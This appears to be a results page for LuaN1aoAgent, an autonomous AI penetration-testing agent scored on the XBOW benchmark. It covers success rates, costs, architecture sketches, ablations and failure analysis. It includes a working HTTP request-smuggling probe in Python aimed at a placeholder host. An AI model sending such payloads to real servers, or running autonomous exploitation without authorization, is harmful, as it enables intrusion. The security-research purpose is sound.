

All experimental data is based on the DeepSeek-V3.2 model on the XBOW Benchmark under zero-shot, zero-human-intervention conditions. Results may vary with different LLM providers or models.

What is the XBOW benchmark?

XBOW is a high-fidelity benchmark designed to evaluate LLM-based security agents. Unlike traditional puzzle-like CTFs, XBOW focuses on real-world vulnerability primitives and multi-stage business logic exploit chains — the kind of attack sequences that arise in production systems, not contrived lab exercises.

104 test cases

Unique scenarios spanning easy, medium, and hard difficulty levels.

OWASP Top 10: 2025

Full coverage across 17 vulnerability categories and 18 CWE identifiers.

Real-world focus

Business logic exploit chains, not contrived CTF puzzles.

Difficulty distribution

  • Level 1 — Easy: 45 cases
  • Level 2 — Medium: 51 cases
  • Level 3 — Hard: 8 cases

Vulnerability categories include IDOR, Privilege Escalation, Injection, and 14 others spanning the full CWE landscape.

Performance results

Under zero-shot, zero-human-intervention conditions, LuaN1aoAgent (powered by DeepSeek-V3.2) established a new state-of-the-art (SOTA) for autonomous penetration testing.
LuaN1aoAgent was awarded top ranking at the Tencent Cloud Hackathon (TCH) for its performance and architecture.

Competitive comparison

| Framework | Success Rate |
| --- | --- |
| LuaN1aoAgent (ours) | 90.4% |
| XBOW Commercial Agent | 85.0% |
| Cyber-AutoAgent v0.1.3 | 84.62% |
| MAPTA (Academic SOTA) | 76.9% |

LuaN1aoAgent outperforms both the leading commercial agent (XBOW’s own system) and the previous academic state-of-the-art by a meaningful margin.

Success rate by difficulty

| Difficulty | Cases | Successes | Success Rate |
| --- | --- | --- | --- |
| Level 1 — Easy | 45 | 44 | 97.8% |
| Level 2 — Medium | 51 | 44 | 86.3% |
| Level 3 — Hard | 8 | 6 | 75.0% |
| Total | 104 | 94 | 90.4% |

The 75% success rate on Level 3 hard tasks — which involve complex cross-service pivoting and multi-stage logic chains — is particularly significant: this is the regime where most frameworks degrade sharply.

Cost efficiency analysis

Leveraging the “Hard Veto” mechanism in the Reflector, LuaN1aoAgent cuts off repetitive, hallucination-driven action loops early, significantly reducing both token consumption and wall-clock time.

$0.09 median cost

Median cost per successful exploit. The average is $0.20, meaning the cost distribution is right-skewed — most exploits are cheap, while a small number of harder tasks consume more of the budget (see the toy illustration after the timing figure below).

11 minutes median time

Median time to success. The fastest exploit completed in 1.6 minutes.
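
To make the right-skew point above concrete, here is a toy illustration. The individual costs are invented (per-task costs are not listed in this document) and chosen only to reproduce the reported median/mean relationship:

```python
from statistics import mean, median

# Invented per-exploit costs: most runs cheap, a few hard tasks expensive.
costs = [0.05, 0.06, 0.08, 0.09, 0.10, 0.12, 0.35, 0.75]

print(median(costs))  # ~0.095: the "typical" exploit is cheap
print(mean(costs))    # ~0.20: the average is pulled up by the expensive tail
```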

Full cost breakdown

| Metric | Value |
| --- | --- |
| Total scenarios | 104 |
| Successful exploits | 94 |
| Success rate | 90.4% |
| Average time per success | 16.1 min |
| Median time per success | 11 min |
| Fastest exploit convergence | 1.6 min |
| Average cost per success | $0.20 |
| Median cost per success | $0.09 |
| Total expenditure (all tasks) | $27.24 |
| Total expenditure (successes only) | $18.91 |

The $0.09 median cost is significant for practical deployment. Running the entire 104-task suite cost $27.24 total — a fraction of what commercial scanners charge for a single engagement.

How results were achieved

The performance comes from the Dual-Graph Cognitive Architecture (DGCA), which combines two complementary graph structures.

Causal Graph (CCG)

Tracks evidence, hypotheses, vulnerabilities, and exploits as nodes in a causal graph. Every hypothesis requires explicit prior evidence, and every causal edge carries a confidence score. This prevents hallucination-driven blind attacks and makes the reasoning chain fully traceable. The Reflector’s “Hard Veto” mechanism uses CCG state to detect when the agent is stuck in a loop and terminates unproductive paths early — a key driver of cost efficiency.
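
A minimal sketch of these two CCG ideas, evidence-gated hypotheses and a repeat-failure veto, assuming a simplified node/edge schema (all class, method, and threshold names here are illustrative, not the project’s actual API):

```python
from collections import Counter
from dataclasses import dataclass, field

@dataclass
class Node:
    node_id: str
    kind: str       # "evidence" | "hypothesis" | "vulnerability" | "exploit"
    summary: str

@dataclass
class CausalGraph:
    nodes: dict = field(default_factory=dict)
    edges: list = field(default_factory=list)   # (src, dst, confidence)

    def add_evidence(self, node_id, summary):
        self.nodes[node_id] = Node(node_id, "evidence", summary)

    def add_hypothesis(self, node_id, summary, supported_by, confidence):
        # Invariant from the text: a hypothesis must cite existing evidence
        # nodes, which blocks evidence-free (hallucinated) attack hypotheses.
        if not supported_by or any(e not in self.nodes for e in supported_by):
            raise ValueError("hypothesis requires prior evidence nodes")
        self.nodes[node_id] = Node(node_id, "hypothesis", summary)
        for ev in supported_by:
            self.edges.append((ev, node_id, confidence))

class Reflector:
    """Hard Veto sketch: prune a path once the same action signature
    keeps failing (the counter resets on any success)."""
    def __init__(self, max_repeats=3):
        self.max_repeats = max_repeats
        self.failures = Counter()

    def observe(self, action_signature, succeeded):
        if succeeded:
            self.failures.pop(action_signature, None)
            return "continue"
        self.failures[action_signature] += 1
        if self.failures[action_signature] >= self.max_repeats:
            return "hard_veto"   # terminate this unproductive path early
        return "continue"

ccg = CausalGraph()
ccg.add_evidence("ev1", "login form reflects raw input in its error page")
ccg.add_hypothesis("hy1", "the username parameter is SQL-injectable",
                   supported_by=["ev1"], confidence=0.6)
```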
Task Graph (DTG)

Models the penetration testing plan as a Directed Acyclic Graph (DAG). The Planner emits structured graph-editing operations (ADD_NODE, UPDATE_NODE, DEPRECATE_NODE) rather than natural language instructions. This enables real-time plan adaptation, automatic parallelization of independent sub-tasks, and topological dependency management.
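
A sketch of how such graph edits might be applied to a plan DAG. The operation names come from the text above, but the payload schema and helper names are assumptions:

```python
# plan: node_id -> {"action": str, "deps": set, "status": str}
plan = {}

def apply_op(op):
    """Apply one Planner-emitted graph edit to the plan DAG."""
    nid = op["id"]
    if op["op"] == "ADD_NODE":
        plan[nid] = {"action": op["action"],
                     "deps": set(op.get("deps", [])),
                     "status": "pending"}
    elif op["op"] == "UPDATE_NODE":
        plan[nid].update(op["fields"])
    elif op["op"] == "DEPRECATE_NODE":
        plan[nid]["status"] = "deprecated"   # kept for traceability, never run

def ready_tasks():
    """Pending nodes whose dependencies are all done. Because several
    nodes can become ready at once, independent sub-tasks parallelize
    automatically, and dependency order is enforced topologically."""
    return [nid for nid, n in plan.items()
            if n["status"] == "pending"
            and all(plan[d]["status"] == "done" for d in n["deps"])]

apply_op({"op": "ADD_NODE", "id": "recon", "action": "enumerate endpoints"})
apply_op({"op": "ADD_NODE", "id": "sqli", "action": "probe login form",
          "deps": ["recon"]})
plan["recon"]["status"] = "done"
print(ready_tasks())   # -> ['sqli']
```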

Ablation study

Disabling either graph component causes a significant performance drop, especially on harder tasks:

| Framework version | Level 1 | Level 2 | Level 3 | Total SR |
| --- | --- | --- | --- | --- |
| LuaN1aoAgent (full) | 97.8% | 86.3% | 75.0% | 90.4% |
| Without Causal Graph (w/o CCG) | 93.3% | 58.8% | 25.0% | 71.2% |
| Without Task Graph (w/o DTG) | 95.6% | 64.7% | 37.5% | 76.0% |
| ReAct baseline | 88.9% | 39.2% | 25.0% | 59.6% |

The performance gap is small on easy tasks but grows dramatically as complexity increases. On hard tasks, removing the Causal Graph drops success from 75% to 25% — the same as the naive ReAct baseline.

Failure analysis

Of the 104 tasks, 10 (9.6%) failed. Root-cause breakdown:

| Category | Root cause | Representative cases | Ratio |
| --- | --- | --- | --- |
| Stochastic observation | Blind SQLi / high-uncertainty environments | XBEN-095, XBEN-056 | 40% |
| Temporal sensitivity | Race conditions / timing-based attacks | XBEN-042 | 20% |
| Protocol bottlenecks | Complex HTTP Smuggling / Desync | XBEN-101 | 20% |
| Context overload | State-knowledge conflation in extreme depth | XBEN-088 | 20% |

Three systemic failure patterns were identified:
  1. Causal misattribution (40%) — The agent misinterprets ambiguous HTTP responses (e.g., 403 from a space filter vs. a WAF blocking SELECT) and incorrectly prunes a valid attack path.
  2. Strategic divergence / “red herring” effect (30%) — The agent is distracted by high-entropy artifacts and ignores a verified exploit window.
  3. Abstraction leakage (30%) — HTTP library middleware normalizes the malformed protocol semantics the attack requires before they reach the wire (e.g., HTTP Smuggling case XBEN-066); a minimal illustration follows this list.
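
To make the abstraction-leakage pattern concrete, here is a hedged sketch of a classic CL.TE request-smuggling probe sent over a raw socket. The host is hypothetical and the payload is the textbook probe, not the specific one XBEN-066 requires; the point is that high-level HTTP clients typically compute framing themselves and may normalize, rewrite, or reject the conflicting headers before the bytes reach the wire:

```python
import socket

# CL.TE probe: the two framing headers must conflict byte-for-byte on
# the wire. "0\r\n\r\nSMUGGLED" is exactly 13 bytes, so a front end that
# honors Content-Length forwards the trailing "SMUGGLED" as the start
# of a second, attacker-controlled request.
payload = (
    b"POST / HTTP/1.1\r\n"
    b"Host: target.example\r\n"          # hypothetical target
    b"Content-Length: 13\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"SMUGGLED"
)

# A raw socket preserves the malformed semantics that an HTTP library's
# middleware would otherwise "fix" on the agent's behalf.
with socket.create_connection(("target.example", 80), timeout=5) as s:
    s.sendall(payload)
    print(s.recv(4096).decode(errors="replace"))
```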

Benchmark traces

Full execution traces for all four experimental variants are available in the repository under xbow-benchmark-results/traces/:
  • traces/Ours/ — Full LuaN1aoAgent
  • traces/Ours-CCG/ — Without Causal Graph
  • traces/Ours-DTG/ — Without Task Graph
  • traces/ReAct/ — ReAct baseline
See the xbow-benchmark-results directory on GitHub for the complete dataset.